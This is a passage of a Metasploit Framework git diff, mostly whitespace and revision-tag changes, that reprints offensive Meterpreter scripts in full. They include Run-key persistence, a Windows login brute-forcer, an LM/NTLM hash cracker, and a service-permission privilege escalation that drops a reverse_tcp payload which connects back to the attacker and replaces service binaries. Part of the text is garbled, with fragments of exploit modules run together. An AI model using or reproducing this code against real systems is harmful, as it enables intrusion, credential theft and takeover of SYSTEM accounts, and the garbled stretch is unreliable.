+ key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
+ # Split the key into its parts
+ root_key, base_key = client.sys.registry.splitkey(key)
+ value = "MS"
+ data = @path
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+end
+
+print_status("Finished!")
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb
index 010f1a4ab1..9e9795b937 100644
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for obtaining a quick VNC session
diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb
index e0637847dc..5111081670 100644
--- a/scripts/meterpreter/webcam.rb
+++ b/scripts/meterpreter/webcam.rb
@@ -2,7 +2,7 @@
# $Revision$
# Author: scriptjunkie
#
-# Simplify running webcam, whether grabbing a single frame or running
+# Simplify running webcam, whether grabbing a single frame or running
# a continous loop.
@client = client
@@ -66,7 +66,7 @@ begin
end
print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}")
client.webcam.webcam_start(index)
-
+
#prepare output
if(gui)
sock = Rex::Socket::Udp.create(
diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb
index 8b06684b38..1ce149edc3 100644
--- a/scripts/meterpreter/win32-sshclient.rb
+++ b/scripts/meterpreter/win32-sshclient.rb
@@ -1,6 +1,7 @@
# win32-sshclient.rb
#
# $Id$
+# $Revision$
#
# Meterpreter script to deploy & run the "plink" commandline ssh-client
# supports only MS-Windows-2k/XP/Vista Hosts
diff --git a/scripts/meterpreter/win32-sshserver.rb b/scripts/meterpreter/win32-sshserver.rb
index 12266ab497..902b85d893 100644
--- a/scripts/meterpreter/win32-sshserver.rb
+++ b/scripts/meterpreter/win32-sshserver.rb
@@ -1,6 +1,7 @@
# win32-sshserver.rb
#
# $Id$
+# $Revision$
#
# meterpreter-script to deploy + run OpenSSH
# on the target machine
diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb
index 2ce1fe1328..3cc3ae5af3 100644
--- a/scripts/meterpreter/winbf.rb
+++ b/scripts/meterpreter/winbf.rb
@@ -4,12 +4,12 @@
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "\tHelp menu."],
- "-t" => [ true, "\tTarget IP Address"],
- "-p" => [ true, "\tPassword List"],
- "-cp" => [ false, "\tCheck Local Machine Password Policy"],
- "-L" => [ true, "\tUsername List to be brute forced"],
- "-l" => [ true, "\tLogin name to be brute forced"]
+ "-h" => [ false, "\tHelp menu."],
+ "-t" => [ true, "\tTarget IP Address"],
+ "-p" => [ true, "\tPassword List"],
+ "-cp" => [ false, "\tCheck Local Machine Password Policy"],
+ "-L" => [ true, "\tUsername List to be brute forced"],
+ "-l" => [ true, "\tLogin name to be brute forced"]
)
# Variables for Options
user = []
@@ -66,56 +66,56 @@ end
def passbf(session,passlist,target,user,opt,logfile)
print_status("Running Brute force attack against #{user}")
print_status("Successfull Username and Password pairs are being saved in #{logfile}")
- result = []
+ result = []
output = []
passfnd = 0
- a = []
+ a = []
i = 0
if opt == 1
if not ::File.exists?(user)
raise "Usernames List File does not exists!"
- else
- user = ::File.open(user, "r")
- end
+ else
+ user = ::File.open(user, "r")
+ end
end
# Go thru each user
user.each do |u|
# Go thru each line in the password file
while passfnd < 1
::File.open(passlist, "r").each_line do |line|
- begin
- print_status("Trying #{u.chomp} #{line.chomp}")
+ begin
+ print_status("Trying #{u.chomp} #{line.chomp}")
+
+ # Command for testing local login credentials
+ r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ output << d
+ end
+ r.channel.close
+ r.close
+
+ # Checks if password is found
+ result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
+ if result.length == 1
+ print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
+ file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
+ r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ output << d
+ end
+ output.clear
+ r.channel.close
+ r.close
+ passfnd = 1
+ break
+ end
+ rescue ::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
- # Command for testing local login credentials
- r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- output << d
- end
- r.channel.close
- r.close
-
- # Checks if password is found
- result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
- if result.length == 1
- print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
- file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
- r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- output << d
- end
- output.clear
- r.channel.close
- r.close
- passfnd = 1
- break
- end
- rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
-
- end
- passfnd = 1
- end
+ end
+ passfnd = 1
+ end
passfnd = 0
end
end
@@ -152,33 +152,31 @@ unsupported if client.platform !~ /win32|win64/i
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
- when "-l"
- user << val
- ulopt = 0
- when "-L"
- userlist = val
- ulopt = 1
-
- when "-cp"
- chkpolicy(session)
- exit
- when "-p"
-
- passlist = val
- if not ::File.exists?(passlist)
- raise "Password File does not exists!"
- end
- when "-t"
- target = val
- when "-h"
- print(
- "Windows Login Brute Force Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
- helpcall = 1
- end
-
+ when "-l"
+ user << val
+ ulopt = 0
+ when "-L"
+ userlist = val
+ ulopt = 1
+
+ when "-cp"
+ chkpolicy(session)
+ exit
+ when "-p"
+
+ passlist = val
+ if not ::File.exists?(passlist)
+ raise "Password File does not exists!"
+ end
+ when "-t"
+ target = val
+ when "-h"
+ print("Windows Login Brute Force Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
+ helpcall = 1
+ end
+
}
# Execution of options selected
@@ -191,11 +189,9 @@ elsif userlist != nil && passlist != nil && target != nil
passbf(session,passlist,target,userlist,ulopt,logme(target))
elsif helpcall == 0
+ print("Windows Login Brute Force Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
- print(
- "Windows Login Brute Force Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
end
diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb
index 8a1bd40653..b91b553545 100644
--- a/scripts/meterpreter/wmic.rb
+++ b/scripts/meterpreter/wmic.rb
@@ -28,7 +28,7 @@ def wmicexec(session,wmiccmds= nil)
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"
- puts wmicfl
+ print_line wmicfl
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing next wmic command
@@ -77,7 +77,7 @@ end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
- puts @@exec_opts.usage
+ print_line @@exec_opts.usage
print_line("USAGE:")
print_line("run wmic -c \"WMIC Command Argument\"\n")
print_line("NOTE:")
diff --git a/scripts/shell/migrate.rb b/scripts/shell/migrate.rb
index 1dd96c9e15..327fef8a3a 100644
--- a/scripts/shell/migrate.rb
+++ b/scripts/shell/migrate.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Simply print a message that migrating is not supported on CommandShell sessions...
#
diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb
index 672e8adc50..e6fa404769 100644
--- a/scripts/shell/spawn_meterpreter.rb
+++ b/scripts/shell/spawn_meterpreter.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Spawn a meterpreter session using an existing command shell session
#
diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb
index 10b0bff8f5..9a8ab88c49 100755
--- a/tools/import_webscarab.rb
+++ b/tools/import_webscarab.rb
@@ -52,7 +52,8 @@ puts("Opening database file: #{db_file}")
database = SQLite3::Database.new(db_file)
# Prepare the insert statement...
-insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created) VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)");
+insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created)" +
+ " VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)");
# target hash -> Resolving dns names is soooo slow, I don't know why. So we use the
# following hash as a "micro hosts", so we don't have to call getaddress each time...
diff --git a/tools/list_interfaces.rb b/tools/list_interfaces.rb
index 5a59f45beb..bc649e192c 100755
--- a/tools/list_interfaces.rb
+++ b/tools/list_interfaces.rb
@@ -1,9 +1,9 @@
#!/usr/bin/env ruby
#
-# $Id:$
-# $Revision:$
+# $Id$
+# $Revision$
#
-# This small utility will display all the informations about the network interfaces
+# This small utility will display all the informations about the network interfaces
# that one can use under Windows with modules using pcaprub and having the INTERFACE option (ex: arp_poisonning, arp_sweep, ...).
# To use th interface option under Windows use the Index value displayed by this tool (ex: "SET INTERFACE 1")
#
@@ -19,14 +19,14 @@ if RUBY_PLATFORM == "i386-mingw32"
Pcap.respond_to?(:interfaces) and
Pcap.respond_to?(:addresses))
$stderr.puts "Error: Looks like you are not running the latest version of pcaprub"
- exit
+ exit
end
found = false
Pcap.interfaces.each_with_index do |iface, i|
found = true
detail = Pcap.interface_info(iface)
addr = Pcap.addresses(iface)
- puts "#" * 70
+ puts "#" * 70
puts ""
puts "INDEX : " + (i + 1).to_s
puts "NAME : " + detail["name"]
diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb
index eba6063b9e..9ff9bdebb3 100755
--- a/tools/lm2ntcrack.rb
+++ b/tools/lm2ntcrack.rb
@@ -68,7 +68,7 @@ $args.parse(ARGV) { |opt, idx, val|
end
}
-if not type
+if not type
usage
else
if pass and (not (hash or list))
@@ -77,20 +77,20 @@ else
mode = PASS_MODE
elsif list and hash and not pass
mode = BRUTE_MODE
- if not File.exist? list
- $stderr.puts "[*] The passwords list file does not exist"
+ if not File.exist? list
+ $stderr.puts "[*] The passwords list file does not exist"
exit
end
- if not File.file? list
- $stderr.puts "[*] The passwords list provided is not a file"
+ if not File.file? list
+ $stderr.puts "[*] The passwords list provided is not a file"
exit
end
- if not File.readable? list
- $stderr.puts "[*] The passwords list file is not readable"
+ if not File.readable? list
+ $stderr.puts "[*] The passwords list file is not readable"
exit
end
else
- usage
+ usage
end
end
@@ -112,8 +112,8 @@ elsif type == "NETNTLM2_SESSION" then
end
end
-case type
-when "HALFLM"
+case type
+when "HALFLM"
case mode
when BRUTE_MODE
if not hash =~ /^([a-fA-F0-9]{16})$/
@@ -122,18 +122,18 @@ when "HALFLM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
- if password =~ /^.{1,7}$/
+ if password =~ /^.{1,7}$/
puts password
- calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase
+ calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase
if calculatedhash == hash.upcase
found = true
match_password = password
break
end
- end
+ end
end
end
if found
@@ -170,7 +170,7 @@ when "HALFLM"
end
end
-when "LM"
+when "LM"
case mode
when BRUTE_MODE
if not hash =~ /^([a-fA-F0-9]{32})$/
@@ -179,7 +179,7 @@ when "LM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,14}$/
@@ -190,7 +190,7 @@ when "LM"
match_password = password
break
end
- end
+ end
end
end
if found
@@ -236,7 +236,7 @@ when "NTLM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -245,7 +245,7 @@ when "NTLM"
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -290,7 +290,7 @@ when "HALFNETLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,7}$/
@@ -304,7 +304,7 @@ when "HALFNETLMv1"
match_password = password
break
end
- end
+ end
end
end
if found
@@ -380,7 +380,7 @@ when "NETLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,14}$/
@@ -392,7 +392,7 @@ when "NETLMv1"
found = true
match_password = password
break
- end
+ end
end
end
end
@@ -404,7 +404,7 @@ when "NETLMv1"
exit
end
when HASH_MODE
- if not pass =~ /^.{1,14}$/
+ if not pass =~ /^.{1,14}$/
$stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters"
exit
end
@@ -423,7 +423,7 @@ when "NETLMv1"
puts "[*] The NETLMv1 hash for #{pass.upcase} is : #{calculatedhash}"
exit
when PASS_MODE
- if not pass =~ /^.{1,14}$/
+ if not pass =~ /^.{1,14}$/
$stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters"
exit
end
@@ -468,18 +468,18 @@ when "NETNTLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
if calculatedhash == hash.upcase
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -498,7 +498,7 @@ when "NETNTLMv1"
$stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
puts "[*] The NETNTLMv1 hash for #{pass} is : #{calculatedhash}"
@@ -516,7 +516,7 @@ when "NETNTLMv1"
$stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
@@ -554,21 +554,21 @@ when "NETNTLM2_SESSION"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase
-
+
if calculatedhash == hash.upcase
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -595,7 +595,7 @@ when "NETNTLM2_SESSION"
$stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
@@ -623,7 +623,7 @@ when "NETNTLM2_SESSION"
$stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
@@ -671,7 +671,7 @@ when "NETLMv2"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -683,7 +683,7 @@ when "NETLMv2"
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -802,7 +802,7 @@ when "NETNTLMv2"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -815,7 +815,7 @@ when "NETNTLMv2"
found = true
match_password = password
break
- end
+ end
end
end
if found
diff --git a/tools/vxdigger.rb b/tools/vxdigger.rb
index 99e2df9b53..f5784a8092 100755
--- a/tools/vxdigger.rb
+++ b/tools/vxdigger.rb
@@ -9,6 +9,8 @@
#
# (C) 2010 Rapid7
#
+# $Revision$
+#
def usage
$stderr.puts "usage: #{$0} [dump-file] "
diff --git a/tools/vxencrypt.rb b/tools/vxencrypt.rb
index dcb2bc8b77..7c8d7d3924 100755
--- a/tools/vxencrypt.rb
+++ b/tools/vxencrypt.rb
@@ -2,8 +2,8 @@
#
# This script can be used to calculate hash values for VxWorks passwords.
#
-
-
+# $Revision$
+#
def hashit(inp)
if inp.length < 8 or inp.length > 120
diff --git a/tools/vxmaster.rb b/tools/vxmaster.rb
index af6014b250..396f567dd8 100755
--- a/tools/vxmaster.rb
+++ b/tools/vxmaster.rb
@@ -9,6 +9,8 @@
#
# (C) 2010 Rapid7
#
+# $Revision$
+#
# VxWorks converts the clear-text password into single integer value. This value
\n") body = body.gsub(/\\t/, " ") - body = "\n\n\n\n
\n\n" - return body + ret = "\n\n\n\n" + ret << "
\n\n" + ret end def create_tnef_exploit diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 0c7dfc6f2d..13abefbcf0 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote end def make_xml(tiff_data) - xml_data = %Q| + xml_data = <<-EOS +
"
- File.open(path1, 'w') do |f2|
+ data = <<-EOS
+
+
+EOS
+ File.open(path1, 'w') do |f2|
f2.puts(data)
- end
-
+ end
+
rescue ::Exception => e
print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb
index 3cb7b1eac9..9562457d46 100644
--- a/scripts/meterpreter/search_dwld.rb
+++ b/scripts/meterpreter/search_dwld.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
## Meterpreter script that recursively search and download
## files matching a given pattern
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
index 2081f66054..5647079650 100644
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ b/scripts/meterpreter/service_permissions_escalate.rb
@@ -1,201 +1,203 @@
-##
-# $Id: service_permissions_escalate.rb scriptjunkie $
-#
-# Many services are configured with insecure permissions. This
-# script attempts to create a service, then searches through a list of
-# existing services to look for insecure file or configuration
-# permissions that will let it replace the executable with a payload.
-# It will then attempt to restart the replaced service to run the
-# payload. If that fails, the next time the service is started (such as
-# on reboot) the attacker will gain elevated privileges.
-#
-# scriptjunkie googlemail com
-##
-
-if client.platform !~ /win32/
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-aggressive = false
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
- case opt
- when "-a"
- aggressive = true
- when "-h"
- print_status("Generic weak service permissions privilege escalation.")
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
-end
-
-# Get the exe payload.
-pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-pay.datastore['LHOST'] = rhost
-pay.datastore['LPORT'] = rport
-raw = pay.generate
-exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-#and placing it on the target in %TEMP%
-tempdir = client.fs.file.expand_path("%TEMP%")
-tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = tempdir + "\\" + tempexename + ".exe"
-print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
-fd = client.fs.file.new(tempexe, "wb")
-fd.write(exe)
-fd.close
-
-#get handler to be ready
-handler = client.framework.exploits.create("multi/handler")
-handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-handler.datastore['LHOST'] = rhost
-handler.datastore['LPORT'] = rport
-handler.datastore['InitialAutoRunScript'] = "migrate -f"
-handler.datastore['ExitOnSession'] = false
-#start a handler to be ready
-handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
-)
-
-#attempt to make new service
-client.railgun.kernel32.LoadLibraryA("advapi32.dll")
-client.railgun.get_dll('advapi32')
-client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
- [ "DWORD", "hService", "in" ]
-])
-
-#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
-
-print_status("Trying to add a new service...")
-adv = client.railgun.advapi32
-manag = adv.OpenSCManagerA(nil,nil,0x10013)
-if(manag["return"] != 0)
- # SC_MANAGER_CREATE_SERVICE = 0x0002
- newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
- #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
- #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
- if(newservice["return"] != 0)
- print_status("Created service... #{newservice["return"]}")
- ret = adv.StartServiceA(newservice["return"], 0, nil)
- print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
- service_delete("walservice")
- adv.CloseServiceHandle(newservice["return"])
- if aggressive == false
- adv.CloseServiceHandle(manag["return"])
- raise Rex::Script::Completed
- end
- else
- print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
- end
-else
- print_status("No privs to create a service...")
- manag = adv.OpenSCManagerA(nil,nil,1)
- if(manag["return"] == 0)
- print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
- end
-end
-print_status("Trying to find weak permissions in existing services..")
-#Search through list of services to find weak permissions, whether file or config
-serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
-#for each service
-service_list.each do |serv|
- begin
- srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
- if srvtype != "16"
- continue
- end
- moved = false
- configed = false
- #default path, but there should be an ImagePath registry key
- source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
- #get path to exe; parse out quotes and arguments
- sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
- sourcemaybe = client.fs.file.expand_path(sourceorig)
- if( sourcemaybe[0] == '"' )
- sourcemaybe = sourcemaybe.split('"')[1]
- else
- sourcemaybe = sourcemaybe.split(' ')[0]
- end
- begin
- client.fs.file.stat(sourcemaybe) #check if it really exists
- source = sourcemaybe
- rescue
- print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
- end
- #try to exploit weak file permissions
- if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
- client.railgun.kernel32.CopyFileA(tempexe, source, false)
- print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
- moved = true
- end
- #try to exploit weak config permissions
- #open with SERVICE_CHANGE_CONFIG (0x0002)
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- if(servhandleret["return"] != 0)
- #SERVICE_NO_CHANGE is 0xFFFFFFFF
- if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
- print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
- configed = true
- end
- adv.CloseServiceHandle(servhandleret["return"])
-
- end
- if(moved != true && configed != true)
- print_status("No exploitable weak permissions found on #{serv}")
- continue
- end
- print_status("Restarting #{serv}")
- #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
- servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
- if(servhandleret["return"] != 0)
- #SERVICE_CONTROL_STOP = 0x00000001
- if(adv.ControlService(servhandleret["return"],1,56))
- client.railgun.kernel32.Sleep(1000)
- adv.StartServiceA(servhandleret["return"],0,nil)
- print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
- #Cleanup
- if moved == true
- client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
- end
- if configed == true
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
- adv.CloseServiceHandle(servhandleret["return"])
- end
- if aggressive == false
- raise Rex::Script::Completed
- end
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- adv.CloseServiceHandle(servhandleret["return"])
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- rescue
- end
-end
-
+##
+# $Id$
+#
+# Many services are configured with insecure permissions. This
+# script attempts to create a service, then searches through a list of
+# existing services to look for insecure file or configuration
+# permissions that will let it replace the executable with a payload.
+# It will then attempt to restart the replaced service to run the
+# payload. If that fails, the next time the service is started (such as
+# on reboot) the attacker will gain elevated privileges.
+#
+# scriptjunkie googlemail com
+#
+# $Revision$
+##
+
+if client.platform !~ /win32/
+ print_error("This version of Meterpreter is not supported with this Script!")
+ raise Rex::Script::Completed
+end
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+ "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
+ "-h" => [ false, "This help menu"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+)
+
+#
+# Default parameters
+#
+
+rhost = Rex::Socket.source_address("1.2.3.4")
+rport = 4444
+aggressive = false
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+ case opt
+ when "-a"
+ aggressive = true
+ when "-h"
+ print_status("Generic weak service permissions privilege escalation.")
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
+end
+
+# Get the exe payload.
+pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+pay.datastore['LHOST'] = rhost
+pay.datastore['LPORT'] = rport
+raw = pay.generate
+exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+#and placing it on the target in %TEMP%
+tempdir = client.fs.file.expand_path("%TEMP%")
+tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
+tempexe = tempdir + "\\" + tempexename + ".exe"
+print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
+fd = client.fs.file.new(tempexe, "wb")
+fd.write(exe)
+fd.close
+
+#get handler to be ready
+handler = client.framework.exploits.create("multi/handler")
+handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
+handler.datastore['LHOST'] = rhost
+handler.datastore['LPORT'] = rport
+handler.datastore['InitialAutoRunScript'] = "migrate -f"
+handler.datastore['ExitOnSession'] = false
+#start a handler to be ready
+handler.exploit_simple(
+ 'Payload' => handler.datastore['PAYLOAD'],
+ 'RunAsJob' => true
+)
+
+#attempt to make new service
+client.railgun.kernel32.LoadLibraryA("advapi32.dll")
+client.railgun.get_dll('advapi32')
+client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
+ [ "DWORD", "hService", "in" ]
+])
+
+#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
+
+print_status("Trying to add a new service...")
+adv = client.railgun.advapi32
+manag = adv.OpenSCManagerA(nil,nil,0x10013)
+if(manag["return"] != 0)
+ # SC_MANAGER_CREATE_SERVICE = 0x0002
+ newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
+ #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
